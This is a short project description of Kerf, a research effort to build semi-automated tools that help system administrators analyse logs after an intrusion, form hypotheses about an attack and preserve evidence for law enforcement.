The objective of the Kerf project is to provide administrators with new methods for the analysis of an attack on their computer system. Numerous intrusion-detection tools exist; our focus is on intrusion analysis, specifically, tools that help administrators to examine large amounts of host and network log data. The Kerf tools fit into the unexplored territory between current approaches that search log data without providing much context and those that report summary statistics about records within the logs.
Given that an intrusion has been detected, the Kerf tools help the administrator answer basic questions about the attack: How, when, and where did the intruder get in? What did the intruder do here? Where did the intruder come from? Did the intruder attack remote machines using my system? Answering these questions allow the administrator to close security holes, determine damage, and collect evidence that may lead to the discovery and capture of the intruder.
Specifically, the aim of the Kerf project is to build semi-automated tools which will allow computer experts and system administrators to: (1) identify the characteristics of an attack given data from network sensors, (2 develop a hypothesis about the nature and origin of the attack, (3) assist the user by automatically refining and extrapolating that hypothesis, (4) share that hypothesis with security managers from other sites, (5) test that hypothesis at those other sites and coordinate the results of testing, and (6) archive the data necessary for use as evidence in later law enforcement actions.